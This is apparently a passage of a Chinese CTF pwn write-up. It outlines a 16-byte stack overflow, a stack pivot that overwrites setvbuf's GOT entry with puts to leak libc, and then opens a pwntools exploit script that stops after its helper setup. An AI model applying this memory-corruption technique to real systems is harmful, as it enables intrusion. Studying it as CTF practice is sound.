栈溢出16个字节
栈迁移打setvbuf的got表
改成puts泄露libc
利用即可。
from pwn import*
from ctypes import*
lib = cdll.LoadLibrary('libc.so.6')
context.log_level='debug'
context.arch='amd64'
context.os = "linux"
sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()
def debug():
gdb.attach(r)
pause()
def lg(s,a